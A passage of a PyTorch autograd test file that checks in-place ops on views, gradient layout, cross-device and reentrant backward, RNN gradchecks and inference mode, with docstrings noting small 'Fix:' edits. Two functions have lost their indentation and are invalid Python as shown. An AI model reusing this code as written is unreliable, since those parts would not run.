                                   (torch.nn.functional.rrelu_, (-5.0, 1.0))):
        a = torch.tensor([-1., 1.], device=device, requires_grad=True)
        b = inplace_fn(a.clone(), *extra_args)
        with self.assertRaisesRegex(RuntimeError, "call out-of-place version"):
            b.backward(torch.ones(2, device=device))
def test_leaky_relu_inplace_with_zero_slope(self, device):
    # Zero slope is still invertible in-place; the gradient is 0 for
    # non-positive inputs (including exactly 0) and 1 otherwise.
    inp = torch.tensor([-2., 0., 2.], device=device, requires_grad=True)
    out = torch.nn.functional.leaky_relu_(inp.clone(), 0.0)
    out.backward(torch.ones(3, device=device))
    self.assertEqual(inp.grad, torch.tensor([0., 0., 1.], device=device))
@onlyOnCPUAndCUDA
def test_elu_inplace_with_neg_alpha(self, device):
    # elu_/celu_ with negative alpha cannot be inverted, so backward must
    # demand the out-of-place variant.
    for inplace_fn in (torch.nn.functional.elu_, torch.nn.functional.celu_):
        a = torch.tensor([-1., 1.], device=device, requires_grad=True)
        b = inplace_fn(a.clone(), alpha=-2)
        with self.assertRaisesRegex(RuntimeError, "call out-of-place version"):
            b.backward(torch.ones(2, device=device))
@onlyCUDA
def test_free_unneeded_tensor(self, device):
    # Intermediates that backward does not need should be freed eagerly.
    x = torch.randn(2, 3, 10, 10, device=device, requires_grad=True)
    m = torch.randn(1, 3, 1, 1, device=device)
    z = x.sum()
    base_mem = torch.cuda.memory_allocated()
    z = ((x + 2) * m).sum()
    end_mem = torch.cuda.memory_allocated()
    # In the end the memory usage should remain equal, because neither of
    # (x + 2) and ((x + 2) * m) should be kept alive for backward, while the
    # previous allocation of z had the same size as the current one.
    self.assertEqual(base_mem, end_mem)
@onlyCUDA
def test_pin_memory(self, device):
    # pin_memory() must produce an equal but distinct tensor that keeps
    # requires_grad, and must be differentiable.
    t = torch.randn(2, 2, dtype=torch.double, requires_grad=True)
    pinned = t.pin_memory()
    self.assertEqual(t, pinned)
    self.assertIsNot(t, t.pin_memory())
    self.assertTrue(t.pin_memory().requires_grad)
    gradcheck(lambda x: x.pin_memory(), [t])
    gradgradcheck(lambda x: x.pin_memory(), [t])
@skipCUDAIfRocm
@onlyCUDA
def test_profiler_emit_nvtx(self, device):
    # This test is not intended to ensure correctness of nvtx ranges.
    # That would require something a great deal more complex (you'd have to create a
    # profile in a subprocess, open it, and parse the sql somehow).
    # This test is merely intended to catch if emit_nvtx breaks on construction.
    t = torch.tensor([1, 2, 3], dtype=torch.float32, device=device)
    with torch.cuda.profiler.profile(), emit_nvtx():
        t.add(1.0)
@onlyCUDA
def test_rnn_backward_to_input_but_not_parameters(self, device):
    # this checks whether it is possible to not require
    # weight parameters, but require inputs, see #7722
    lstm = torch.nn.LSTM(2, 3).to(device)
    for param in lstm.parameters():
        param.requires_grad = False
    s = torch.randn(1, 1, 2, requires_grad=True, device=device)
    output, _ = lstm(s)
    output.sum().backward()
    self.assertFalse(s.grad is None or s.grad.abs().sum().item() == 0)
@onlyCUDA
def test_lstmcell_backward_only_one_output_grad(self, device):
    # checks that undefined gradients doesn't hamper the backward
    # see #11872
    cell = torch.nn.LSTMCell(2, 3).to(device).double()
    s = torch.randn(1, 2, device=device, dtype=torch.double, requires_grad=True)
    for output_idx in range(2):
        cell(s)[output_idx].sum().backward()
        self.assertFalse(s.grad is None or s.grad.abs().sum().item() == 0)
def _test_rnn_mod(self, mod, inp):
    """gradcheck/gradgradcheck an RNN module (CuDNN disabled), then verify
    the error message for unsupported CuDNN double backward on CUDA."""
    def flatten_out(mod, inp):
        # RNN modules return nested tuples; flatten to a tuple of tensors
        # so gradcheck can consume the outputs.
        out = mod(inp)
        return tuple([t if isinstance(t, torch.Tensor) else tt for t in out for tt in t])
    gradcheckfunc = partial(flatten_out, mod)
    with torch.backends.cudnn.flags(enabled=False):
        gradcheck(gradcheckfunc, inp, check_batched_grad=False)
        gradgradcheck(gradcheckfunc, inp, check_batched_grad=False)
    if inp.is_cuda and not TEST_WITH_ROCM:
        # Assert that we have good error message around unsupported CuDNN double backward
        # NB: we trigger double backward using .backward() instead of autograd.grad due to
        # https://github.com/pytorch/pytorch/issues/37874
        with torch.backends.cudnn.flags(enabled=True):
            result = gradcheckfunc(inp)
            result[0].sum().backward(create_graph=True)
            grad0 = next(mod.parameters()).grad
            with self.assertRaisesRegex(RuntimeError,
                                        "please disable the CuDNN backend temporarily"):
                grad0.sum().backward()
            # Here we avoid the backward(create_graph=True) memory leak
            # described in https://github.com/pytorch/pytorch/issues/7343
            for param in mod.parameters():
                param.grad = None
            inp.grad = None
@skipMeta  # LSTM cell reuses output which was resized
def test_LSTM_grad_and_gradgrad(self, device):
    # grad/gradgrad an LSTM with and without bias.
    hidden = 4
    inp = torch.rand(1, 3, hidden, device=device, dtype=torch.float64, requires_grad=True)
    for use_bias in (True, False):
        lstm = torch.nn.LSTM(hidden, hidden, bias=use_bias).to(device).to(torch.float64)
        self._test_rnn_mod(lstm, inp)
@skipMeta  # GRU cell reuses output which was resized
def test_GRU_grad_and_gradgrad(self, device):
    # grad/gradgrad a GRU with and without bias.
    hidden = 4
    inp = torch.rand(1, 3, hidden, device=device, dtype=torch.float64, requires_grad=True)
    for use_bias in (True, False):
        gru = torch.nn.GRU(hidden, hidden, bias=use_bias).to(device).to(torch.float64)
        self._test_rnn_mod(gru, inp)
def test_copysign_subgradient(self, device):
    # Subgradient convention at the signed-zero boundary: the gradient
    # w.r.t. `other` is always zero, and the gradient w.r.t. `input`
    # flips with the sign chosen by `other`.
    cases = (
        # (input values, other values, expected input grad)
        ([0.0, 0.0, 0.0], [-1.0, 0.0, 1.0], [0.0, 0.0, 0.0]),      # Input is 0.0
        ([-0.0, -0.0, -0.0], [-1.0, 0.0, 1.0], [0.0, 0.0, 0.0]),   # Input is -0.0
        ([-1.0, 0.0, 1.0], [0.0, 0.0, 0.0], [-1.0, 0.0, 1.0]),     # Other is 0.0
        ([-1.0, 0.0, 1.0], [-0.0, -0.0, -0.0], [1.0, 0.0, -1.0]),  # Other is -0.0
    )
    for x_vals, y_vals, expected_x_grad in cases:
        x = torch.tensor(x_vals, dtype=torch.float, device=device, requires_grad=True)
        y = torch.tensor(y_vals, dtype=torch.float, device=device, requires_grad=True)
        torch.copysign(x, y).sum().backward()
        self.assertEqual(x.grad.tolist(), expected_x_grad)
        self.assertEqual(y.grad.tolist(), [0.0] * 3)
@deviceCountAtLeast(1)
def test_grad_assignment(self, devices):
    # Assigning to .grad must reject mismatched shape/dtype/device and
    # self-assignment, while allowing legitimate assignments.
    primary = devices[0]
    x = torch.randn(5, 5, device=primary)
    # Wrong shape is rejected.
    with self.assertRaises(RuntimeError):
        x.grad = torch.randn(2, 2, device=primary)
    # Wrong dtype is rejected.
    with self.assertRaises(RuntimeError):
        x.grad = torch.randn(5, 5, dtype=torch.long, device=primary)
    # A tensor cannot be its own grad.
    with self.assertRaises(RuntimeError):
        x.grad = x
    # A device-resident grad cannot be attached to a CPU tensor.
    if self.device_type != 'cpu':
        with self.assertRaises(RuntimeError):
            t_cpu = torch.rand(5, 5)
            t_cpu.grad = torch.randn(5, 5, device=primary)
    # Half precision grads are accepted on CUDA.
    if self.device_type == 'cuda':
        x = x.to(dtype=torch.half, device=primary)
        x.grad = torch.zeros_like(x)
    # Cross-device grad assignment is rejected.
    if len(devices) > 1:
        x = torch.randn(5, 5, device=primary)
        with self.assertRaises(RuntimeError):
            x.grad = torch.randn(5, 5, device=devices[1])
@deviceCountAtLeast(1)
@dtypes(torch.float, torch.double)
def test_requires_grad_factory(self, devices, dtype):
    """*_like factory functions must honor requires_grad, dtype and device.

    Fix: the device assertion now inspects ``output`` — the tensor the
    factory under test just produced — instead of ``x``, whose device is
    fixed at creation and therefore verified nothing about the factory.
    """
    fns = [torch.ones_like, torch.randn_like]
    x = torch.randn(2, 3, dtype=dtype, device=devices[0])
    for fn in fns:
        for requires_grad in [True, False]:
            output = fn(x, dtype=dtype, device=devices[0], requires_grad=requires_grad)
            self.assertEqual(requires_grad, output.requires_grad)
            self.assertIs(dtype, output.dtype)
            self.assertEqual(devices[0], str(output.device))
@deviceCountAtLeast(2)
def test_unused_output_device(self, devices):
    # Backward through only one replica of Broadcast must still produce a
    # gradient for the input.
    from torch.nn.parallel._functions import Broadcast
    inp = torch.randn(5, 5, dtype=torch.float, device=devices[0], requires_grad=True)
    replicas = Broadcast.apply(list(range(len(devices))), inp)
    (replicas[-1] * 2).sum().backward()
    # TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
    self.assertEqualIgnoreType(inp.grad, torch.ones(5, 5) * 2)
@deviceCountAtLeast(2)
def test_backward_device(self, devices):
    # check that current device matches the variable's device
    observed_device = [None]
    class Identity(torch.autograd.Function):
        @staticmethod
        def forward(ctx, x):
            return x.clone()
        @staticmethod
        def backward(ctx, grad_output):
            # Record which device the incoming gradient lives on.
            observed_device[0] = grad_output.device
            return grad_output.clone()
    v = torch.randn(1, device=devices[1], requires_grad=True)
    Identity.apply(v).backward()
    self.assertEqual(str(observed_device[0]), devices[1])
@deviceCountAtLeast(2)
def test_inputbuffer_add_multidevice(self, devices):
    # Summing two gradients that both live on a second device must work in
    # the engine's InputBuffer.
    src = torch.randn(1, device=devices[0], requires_grad=True)
    moved_sum = src.to(device=devices[1]) + src.to(device=devices[1])
    moved_sum.backward()
@onlyCPU
def test_copy_(self, device):
    # At the time of writing this test, copy_ is not generated from native_functions.yaml
    # there was a bug that bfloat16 was not recognized as floating.
    src = torch.randn(10, device=device, requires_grad=True)
    for dt in (d for d in torch.testing.get_all_dtypes() if d.is_floating_point):
        dst = torch.empty(10, device=device, dtype=dt)
        dst.copy_(src)
        self.assertTrue(dst.requires_grad)
    # .to() must likewise keep requires_grad for bfloat16.
    z = src.to(torch.bfloat16)
    self.assertTrue(z.requires_grad)
@onlyCUDA
def test_simple_reentrant_cross_device(self, device):
    """Reentrant backward calls must work whether the inner backward is
    queued on the CPU or the GPU autograd thread; the class-level
    ``_cpu_mode`` flag selects where the inner graph lives."""
    class ReentrantFunc(Function):
        # Class attribute toggled between the three scenarios below.
        _cpu_mode = True
        @staticmethod
        def forward(ctx, x):
            return x * (x + 2)
        @staticmethod
        def backward(ctx, grad_output):
            # Run a fresh, unrelated backward from inside this backward
            # (a "reentrant" call), on CPU or GPU depending on _cpu_mode.
            with torch.enable_grad():
                if ReentrantFunc._cpu_mode:
                    new_param = torch.randn(2, 2, requires_grad=True)
                    (new_param ** 2).sum().backward()
                else:
                    new_param = torch.randn(2, 2, device=device, requires_grad=True)
                    (new_param ** 2).sum().backward()
            return grad_output
    # Reentrant starts on GPU thread, finishs on GPU thread
    x = torch.randn(2, 2, device=device, requires_grad=True)
    out = ReentrantFunc.apply(x)
    out.sum().backward()
    # Reentrant starts on CPU thread, finishs on GPU thread
    x = torch.randn(2, 2, requires_grad=True)
    # set ReentrantFunc node to GPU to emit tasks to GPU queue
    ReentrantFunc._cpu_mode = False
    out = ReentrantFunc.apply(x)
    out.sum().backward()
    # Reentrant starts on GPU thread, finishs on CPU thread
    x = torch.randn(2, 2, device=device, requires_grad=True)
    # set ReentrantFunc node to CPU to emit tasks to CPU queue
    ReentrantFunc._cpu_mode = True
    out = ReentrantFunc.apply(x)
    out.sum().backward()
@onlyCUDA
def test_cross_device_reentrant_autograd(self, device):
    """Regression test: an empty NodeTask sent from the CPU thread to the
    GPU thread's ReadyQueue used to segfault during reentrant autograd."""
    # Output on gpu so that this task will be associated with the gpu thread
    def fn_on_gpu(inp):
        # Artificially increase the priority of the next op to make sure it runs
        # as soon as we reach it before the ops of branch1.
        dummy = inp * 2 * 2 * 2 * 2
        return inp.to(device=device)
    def parent_on_cpu(inp):
        # Slow branch of ops on gpu so that the work queue for the gpu thread
        # won't empty too quickly. They also have smaller priorities than the
        # ones created by fn_on_gpu
        branch1 = inp.to(device=device)
        branch1 = branch1 / branch1
        branch1 = branch1 / branch1
        branch1 = branch1 / branch1
        # Perform checkpoint on cpu tensors. So the last op performed in the reentrant
        # autograd is an AccumulateGrad that runs on the cpu thread for the gpu thread.
        # So the cpu thread will notify the gpu thread with an empty NodeTask.
        branch2 = checkpoint(fn_on_gpu, inp)
        out = branch2 + branch1
        return out
    inp = torch.rand(2, requires_grad=True)
    out = parent_on_cpu(inp)
    # This will segfault if the empty NodeTask is not handled properly in the
    # gpu thread ReadyQueue
    out.sum().backward()
def test_inplace_on_view_backprop_base(self, device):
    # modify view and back-prop through base
    root = torch.randn(2, 2, device=device, requires_grad=True)
    base = root.clone()
    base.narrow(0, 0, 1).mul_(2)
    base.sum().backward()
    # The doubled row picks up gradient 2, the untouched row 1.
    self.assertEqual(root.grad.tolist(), [[2, 2], [1, 1]])
def test_inplace_on_view_backprop_view_of_view(self, device):
    # modify view and backprop through view-of-view
    root = torch.randn(2, 2, device=device, requires_grad=True)
    base = root.clone()
    view_a = base.narrow(0, 0, 1)
    view_b = base.narrow(0, 0, 1)
    view_a.mul_(2)
    view_b.sum().backward()
    # Only the narrowed row participates; it was scaled by 2 in-place.
    self.assertEqual(root.grad.tolist(), [[2, 2], [0, 0]])
def test_inplace_on_view_of_view(self, device):
    # modify view-of-view and backprop through base
    root = torch.randn(2, 2, device=device, requires_grad=True)
    base = root.clone()
    inner_view = base.narrow(0, 0, 1).narrow(1, 1, 1)
    inner_view.mul_(2)
    base.sum().backward()
    # Only the single doubled element gets gradient 2.
    self.assertEqual(root.grad.tolist(), [[1, 2], [1, 1]])
def test_inplace_on_view_then_no_grad(self, device):
# Perform an in-place operation on a view of a non-leaf variable.
a = torch.ones(3, 1, dtype=torch.double, device=device, requires_grad=True)
b = a * 2
c = b.view_as(b)
c[0][0] = 3
# Force a graph update with grad disabled.
with torch.no_grad():
c.grad_fn
c.sum().backward()
def test_inplace_on_view_gradcheck(self, device):
    # gradcheck modifications to views
    base_inp = torch.randn(4, 4, dtype=torch.double, device=device, requires_grad=True)
    mul_inp = torch.randn(2, 2, dtype=torch.double, device=device, requires_grad=True)
    def func(root, b):
        out = root.clone()
        # Two overlappingly-derived views, both mutated in place.
        out.narrow(1, 2, 2).narrow(0, 1, 2).mul_(b)
        out.narrow(1, 0, 2).narrow(0, 1, 2).mul_(b)
        return out
    gradcheck(func, [base_inp, mul_inp], raise_exception=True)
    grad_out = torch.randn(base_inp.size(), dtype=torch.double, device=device, requires_grad=True)
    gradgradcheck(func, (base_inp, mul_inp), (grad_out,))
def test_inplace_on_view_multiple_outputs(self, device):
    """In-place ops on one output of a multi-output view (unbind) must raise.

    Fix: the root tensor is now created on ``device``; previously the
    ``device`` argument was silently ignored, so this device-generic test
    only ever exercised the CPU.
    """
    root = torch.arange(9., dtype=torch.double, device=device).reshape(3, 3).requires_grad_()
    x = root.clone()
    v1 = x.unbind()
    with self.assertRaises(RuntimeError):
        v1[0].mul_(2)
def test_inplace_on_view_of_multiple_output_view(self, device):
    # Mutating a view taken of one output of a multi-output view must raise.
    base = torch.rand(10, dtype=torch.double, device=device, requires_grad=True).clone()
    outputs = base.unbind(0)
    view_of_output = outputs[0].view_as(outputs[0])
    with self.assertRaises(RuntimeError):
        view_of_output.mul_(2)
def test_inplace_multiple_output_view_of_view(self, device):
    # Mutating an output of a multi-output view taken of a view must raise.
    base = torch.rand(10, dtype=torch.double, device=device, requires_grad=True).clone()
    aliased = base.view_as(base)
    outputs = aliased.unbind(0)
    with self.assertRaises(RuntimeError):
        outputs[0].mul_(2)
def test_inplace_on_view_makes_base_require_grad(self, device):
    # in-place modification to view makes base require grad
    no_grad_inp = torch.randn(4, 4, dtype=torch.double, device=device, requires_grad=False)
    grad_inp = torch.randn(4, 2, dtype=torch.double, device=device, requires_grad=True)
    def func(root, b):
        out = root.clone()
        self.assertFalse(out.requires_grad)
        out.narrow(1, 2, 2).mul_(b)
        # The in-place op on the view propagates requires_grad to the base.
        self.assertTrue(out.requires_grad)
        return out
    gradcheck(func, [no_grad_inp, grad_inp], raise_exception=True)
    grad_out = torch.randn(no_grad_inp.size(), dtype=torch.double, device=device, requires_grad=True)
    gradgradcheck(func, (no_grad_inp, grad_inp), (grad_out,))
def test_inplace_on_view_backprop_view(self, device):
    # modify view and backprop through view
    base = torch.tensor([2., 5.], device=device, requires_grad=False)
    factor = torch.tensor([3.], device=device, requires_grad=True)
    result = base.narrow(0, 1, 1).mul_(factor)
    result.sum().backward()
    # d(result)/d(factor) is the original value at the narrowed slot (5).
    self.assertEqual(factor.grad.tolist(), [5])
    self.assertIsNone(base.grad)
def test_inplace_on_view_modify_base(self, device):
    # Test that an in-place operation on a base that forced it to require
    # grad also forces any previous views to require grad and backprop
    # correctly
    r = torch.ones(1, dtype=torch.double, device=device, requires_grad=True)
    def fn(r):
        base = torch.ones(5, dtype=torch.double, device=device)
        view = base.select(0, 1)
        self.assertFalse(view.requires_grad)
        self.assertIsNone(view.grad_fn)
        base.add_(r)  # view is now dependent on r due to the in-place op on base
        self.assertTrue(view.requires_grad)
        return view
    gradcheck(fn, [r])
    gradgradcheck(fn, [r])
def test_inplace_on_view_python(self, device):
    # in-place modifications of Python-autograd created view
    a = torch.randn(4, 4, dtype=torch.double, device=device, requires_grad=True)
    b = torch.randn(2, 2, dtype=torch.double, device=device, requires_grad=True)
    class PyAdd(torch.autograd.Function):
        """In-place add implemented as a custom Function; mark_dirty tells
        autograd that x was modified in place."""
        @staticmethod
        def forward(ctx, x, y):
            ctx.mark_dirty(x)
            x.add_(y)
            return x
        @staticmethod
        def backward(ctx, grad):
            # d(x + y)/dx == d(x + y)/dy == identity.
            return grad, grad
    def func(root, b):
        x = root.clone()
        # Apply the custom in-place op to two overlapping sub-views.
        PyAdd.apply(x.narrow(1, 2, 2).narrow(0, 1, 2), b)
        PyAdd.apply(x.narrow(1, 0, 2).narrow(0, 1, 2), b)
        return x
    gradcheck(func, [a, b], raise_exception=True)
    go = torch.randn(a.size(), dtype=torch.double, device=device, requires_grad=True)
    gradgradcheck(func, (a, b), (go,))
def test_inplace_on_view_non_contig(self, device):
    # In-place op on a view of a non-contiguous (select + transpose) leaf.
    root = torch.ones(2, 3, 2, device=device).select(2, 1).t().requires_grad_(True)
    base = root.clone()
    sub_view = base.narrow(0, 0, 1).narrow(1, 1, 1)
    sub_view.mul_(2)
    base.sum().backward()
    self.assertEqual(root.grad.tolist(), [[1, 2], [1, 1], [1, 1]])
def test_inplace_on_view_multi_output_unsafe(self, device):
for f in [lambda t: t.unsafe_split(1),
lambda t: t.unsafe_split_with_sizes((1, 1, 1)),
lambda t: t.unsafe_chunk(3)]:
a = torch.randn(3, 3, device=device, requires_grad=True)
b = a + a
s1, s2, s3 = f(b)
s1.mul_(s2)
s1.sum().backward()
def test_inplace_on_view_multi_output_safe(self, device):
    # The safe split/chunk variants must reject in-place ops on their outputs.
    splitters = [lambda t: t.split(1),
                 lambda t: t.split_with_sizes((1, 1, 1)),
                 lambda t: t.chunk(3)]
    for split in splitters:
        leaf = torch.randn(3, 3, device=device, requires_grad=True)
        doubled = leaf + leaf
        first, second, _ = split(doubled)
        error_msg = 'This view is the output of a function that returns multiple views.'
        with self.assertRaisesRegex(RuntimeError, error_msg):
            first.mul_(second)
def test_mv_grad_stride_0(self, device):
    # Reference: https://github.com/pytorch/pytorch/issues/38315
    """mv backward must handle a stride-0 (expanded) vector gradient.

    Fix: ``(vec)`` is not a tuple — the parentheses are a no-op, so the bare
    tensor was being passed where a tuple of inputs was intended. It happened
    to work because gradcheck accepts a lone tensor, but ``(vec,)`` states the
    intent correctly.
    """
    mat = torch.randn(2, 2, dtype=torch.double, device=device)
    vec = torch.randn(1, dtype=torch.double, device=device).requires_grad_(True)
    def fn(vec):
        # Expand inside the function to make sure the input to
        # gradcheck does not have overlapping memory
        vec = vec.expand(2)
        return (mat @ vec).sum()
    gradcheck(fn, (vec,))
    gradgradcheck(fn, (vec,))
@onlyCUDA
def test_gradcheck_input_output_different_device(self, device):
    # gradcheck must cope with functions whose output lives on a different
    # device than the input, in both directions.
    for src_dev, dst_dev in (("cuda", "cpu"), ("cpu", "cuda")):
        inp = torch.ones((1,), dtype=torch.double, device=src_dev, requires_grad=True)
        gradcheck(lambda x: x.to(dst_dev), (inp,))
# TODO: see if this can be OpInfo'd or moved to test_reductions.py
def test_logcumsumexp_large_value(self, device):
    """gradcheck/gradgradcheck logcumsumexp along every dim when one slice
    holds a very large value (exercises the overflow-safe path).

    Fix: the input is now created on ``device``; previously the ``device``
    argument was silently ignored, so the test only ever ran on CPU.
    """
    a = torch.rand(4, 4, 4, dtype=torch.double, device=device, requires_grad=True)
    with torch.no_grad():
        # Large Number
        a[0] = 10000
    for dim in range(3):
        gradcheck(lambda x: x.logcumsumexp(dim), a)
        gradgradcheck(lambda x: x.logcumsumexp(dim), a)
def test_strided_leaf_grad_layout(self, device):
    """Gradients of strided leaves follow two rules, checked below:
    (1) dense, non-overlapping leaves get a grad with matching strides;
    (2) non-dense leaves get a row-major contiguous grad."""
    # (1) If leaf is non-overlapping and dense, grad's layout should match its leaf.
    for fmt_a in (torch.contiguous_format, torch.channels_last):
        for fmt_b in (torch.contiguous_format, torch.channels_last):
            a = torch.rand((2, 3, 4, 5), device=device).to(memory_format=fmt_a)
            b = torch.rand((2, 3, 4, 5), device=device).to(memory_format=fmt_b)
            a.requires_grad_()
            b.requires_grad_()
            # checks (1) for broadcasted gradients
            a.sum().backward()
            self.assertEqual(a.grad.stride(), a.stride())
            b.sum().backward()
            self.assertEqual(b.grad.stride(), b.stride())
            # checks (1) for non-broadcasted gradients
            a.grad = None
            b.grad = None
            (a * b).sum().backward()
            self.assertEqual(a.grad.stride(), a.stride())
            self.assertEqual(b.grad.stride(), b.stride())
    # (2) If leaf isn't dense, checks that grads are rowmajor contiguous.
    c = torch.empty_strided((2, 2), (4, 2), device=device).copy_(torch.rand((2, 2), device=device))
    c.requires_grad_()
    d = torch.rand((2, 2), device=device)
    # checks (2) for broadcasted gradients
    c.sum().backward()
    self.assertEqual(c.grad.stride(), (2, 1))
    # checks (2) for non-broadcasted gradients
    c.grad = None
    (c * d).sum().backward()
    self.assertEqual(c.grad.stride(), (2, 1))
# TODO: OpInfo this or move to atleast's test suite
def _test_atleast(self, device, torch_fn):
    """gradcheck/gradgradcheck ``torch_fn`` (an ``atleast_*`` variant) on
    0-dim through 4-dim inputs, individually and all at once.

    Fix: every tensor is now created on ``device``; previously the
    ``device`` argument was accepted but ignored, so the device-generic
    framework only ever exercised the CPU.
    """
    # 0-dim
    s = torch.tensor(0.5, dtype=torch.double, device=device, requires_grad=True)
    gradcheck(lambda x: torch_fn(x), s)
    gradgradcheck(lambda x: torch_fn(x), s)
    # 1-dim
    a = torch.rand(4, dtype=torch.double, device=device, requires_grad=True)
    gradcheck(lambda x: torch_fn(x), a)
    gradgradcheck(lambda x: torch_fn(x), a)
    # 2,3,4-dim
    b = torch.rand(4, 3, dtype=torch.double, device=device, requires_grad=True)
    c = torch.rand(4, 3, 2, dtype=torch.double, device=device, requires_grad=True)
    d = torch.rand(4, 3, 2, 1, dtype=torch.double, device=device, requires_grad=True)
    # All ranks at once (atleast_* also accepts multiple tensors).
    input_tuple = (s, a, b, c, d)
    gradcheck(lambda s, w, x, y, z: torch_fn(s, w, x, y, z), input_tuple)
    gradgradcheck(lambda s, w, x, y, z: torch_fn(s, w, x, y, z), input_tuple)
def test_atleast(self, device):
    # Run the shared _test_atleast driver over all three atleast variants.
    for atleast_fn in (torch.atleast_1d, torch.atleast_2d, torch.atleast_3d):
        self._test_atleast(device, atleast_fn)
# TODO: opinfo this or move to test_binary_ufuncs.py
def test_xlogy(self, device):
    """gradcheck/gradgradcheck torch.xlogy over broadcastable shapes,
    scalar operands, and inputs with zeros in the x position.

    Fix: several calls passed ``(y)`` — which is just ``y``, not a tuple —
    where a tuple of inputs was intended. gradcheck tolerates a bare tensor,
    but ``(y,)`` expresses the intent correctly.
    """
    def _tensor_tensor_helper(x, y):
        gradcheck(lambda x, y: torch.xlogy(x, y), (x, y))
        gradgradcheck(lambda x, y: torch.xlogy(x, y), (x, y))
        with torch.no_grad():
            x = x.clone()
            # Zero out about half of x to hit the x == 0 special case.
            x[torch.rand_like(x) > 0.5] = 0
        gradcheck(lambda y: torch.xlogy(x, y), (y,))
        gradgradcheck(lambda y: torch.xlogy(x, y), (y,))
    shapes = ((4,), (1, 4), (1, 1, 4), (1, 1, 1, 4))
    # For broadcastible shapes and scalar.
    for x_shape, y_shape in permutations(shapes, 2):
        x = torch.rand(*x_shape, dtype=torch.double, device=device, requires_grad=True)
        y = torch.rand(*y_shape, dtype=torch.double, device=device, requires_grad=True)
        _tensor_tensor_helper(x, y)
        _tensor_tensor_helper(y, x)
        # Scalar in either position.
        gradcheck(lambda y: torch.xlogy(0, y), (y,))
        gradgradcheck(lambda y: torch.xlogy(0, y), (y,))
        gradcheck(lambda y: torch.xlogy(2, y), (y,))
        gradgradcheck(lambda y: torch.xlogy(2, y), (y,))
        gradcheck(lambda y: torch.xlogy(y, 2), (y,))
        gradgradcheck(lambda y: torch.xlogy(y, 2), (y,))
    # Different shape
    x = torch.rand(2, 3, 4, 5, dtype=torch.double, device=device, requires_grad=True)
    y = torch.rand(4, 5, dtype=torch.double, device=device, requires_grad=True)
    _tensor_tensor_helper(x, y)
    _tensor_tensor_helper(y, x)
    _tensor_tensor_helper(x, x)
    _tensor_tensor_helper(y, y)
    # Same shape
    x = torch.rand(4, 5, dtype=torch.double, device=device, requires_grad=True)
    y = torch.rand(4, 5, dtype=torch.double, device=device, requires_grad=True)
    _tensor_tensor_helper(x, y)
    _tensor_tensor_helper(y, x)
    _tensor_tensor_helper(x, x)
    _tensor_tensor_helper(y, y)
def test_copy_r_to_c(self, device):
    """Copying a real tensor into a complex one must backprop cleanly
    (gradient of the sum flows back as ones) and must not emit warnings."""
    out_c = torch.empty(3, 2, dtype=torch.cdouble, device=device)
    inp_r = torch.randn(3, 2, dtype=torch.double, device=device,
                        requires_grad=True)

    def do_test():
        out_c.copy_(inp_r)
        out_c.sum().backward()
        self.assertEqual(inp_r.grad, torch.ones_like(inp_r))

    # assertNotWarn verifies the real->complex copy path is warning-free.
    self.assertNotWarn(do_test)
def test_non_differentiable_ops(self, device):
    """Ops with non-differentiable outputs must run without error and
    return tensors with requires_grad=False, even for grad-requiring inputs."""
    # isin produces a boolean mask — never differentiable.
    x = torch.tensor([[1, 2], [3, 4.]], requires_grad=True, device=device)
    out = torch.isin(x, torch.tensor([2, 3], device=device))
    self.assertFalse(out.requires_grad)

    # signbit produces a boolean tensor — never differentiable.
    # Fix: pass `device=device` — this tensor previously ignored the device
    # this test is parameterized over and always ran on the default device.
    x = torch.randn(3, 3, requires_grad=True, device=device)
    out = torch.signbit(x)
    self.assertFalse(out.requires_grad)
class TestAutogradInferenceMode(TestCase):
    """Tests for torch.inference_mode semantics: which tensors become
    inference tensors, and which interactions between inference and
    normal tensors are allowed, for functional / inplace / view ops."""

    def _is_inference_tensor(self, tensor):
        # True iff accessing ._version raises the inference-tensor error.
        try:
            err_msg = "Inference tensors do not track version counter"
            with self.assertRaisesRegex(RuntimeError, err_msg):
                tensor._version
            return True
        except AssertionError as e:
            return False

    def test_inference_mode_context_manager(self):
        """inference_mode(True/False) nests and restores the previous state."""
        self.assertFalse(torch.is_inference_mode_enabled())
        with torch.inference_mode():
            self.assertTrue(torch.is_inference_mode_enabled())
            with torch.inference_mode(False):
                self.assertFalse(torch.is_inference_mode_enabled())
            self.assertTrue(torch.is_inference_mode_enabled())
        self.assertFalse(torch.is_inference_mode_enabled())

    def test_inference_mode_decorator(self):
        """@torch.inference_mode() enables the mode inside the decorated fn."""
        @torch.inference_mode()
        def func(x):
            self.assertTrue(torch.is_inference_mode_enabled())
            return x * x

        for requires_grad in (True, False):
            c = torch.ones(1, 2, 3, requires_grad=requires_grad)
            d = func(c)
            self.assertTrue(torch.is_inference(d))
            self.assertFalse(d.requires_grad)

    def test_inference_mode_tensor_creation(self):
        with torch.inference_mode():
            # new tensors created through constructors are inference tensors
            c = torch.ones(1, 2, 3)
            self.assertFalse(c.requires_grad)
            self.assertTrue(torch.is_inference(c))

            # requires_grad doesn't change inference tensor behavior in InferenceMode
            tmp = torch.ones(1, 2, 3, requires_grad=True)
            self.assertTrue(tmp.requires_grad)
            self.assertTrue(torch.is_inference(tmp))

            tmp = torch.ones(1, 2, 3).requires_grad_(False)
            self.assertFalse(tmp.requires_grad)
            self.assertTrue(torch.is_inference(tmp))

    def test_inference_mode_existing_autograd_session(self):
        """Inplace-updating a saved (normal) tensor inside inference mode
        still bumps its version counter, so backward detects the mutation."""
        s = torch.ones(1, 2, 3, requires_grad=True)
        a = s.clone()

        # `a` gets saved outside of inference mode
        out = a * a
        with torch.inference_mode():
            a.add_(2)

        self.assertFalse(torch.is_inference(a))
        # tensors created outside of inference mode aren't
        # inference tensors, so they will still have their
        # version counters tracked
        err_msg = ("one of the variables needed for gradient computation has been "
                   "modified by an inplace operation")
        with self.assertRaisesRegex(RuntimeError, err_msg):
            out.backward(torch.ones_like(out))

    def test_inference_mode_inf_tensor_in_inf_mode_functional_op(self):
        def functional_op(x):
            return x * x

        with torch.inference_mode():
            for requires_grad in (True, False):
                c = torch.ones(1, 2, 3, requires_grad=requires_grad)

                # performing a non-view operation produces an inference tensor
                # that does not require grad
                func_out = functional_op(c)
                self.assertTrue(torch.is_inference(func_out))
                self.assertFalse(func_out.requires_grad)

    def test_inference_mode_inf_tensor_in_inf_mode_inplace_op(self):
        @torch.inference_mode()
        def run_test(fn):
            for requires_grad in (True, False):
                c = torch.ones(1, 2, 3, requires_grad=requires_grad)

                # after performing inplace operation, tensor is still
                # an inference tensor
                fn(c)
                self.assertTrue(torch.is_inference(c))
                self.assertEqual(c.requires_grad, requires_grad)
        run_test(lambda x: x.add_(2))
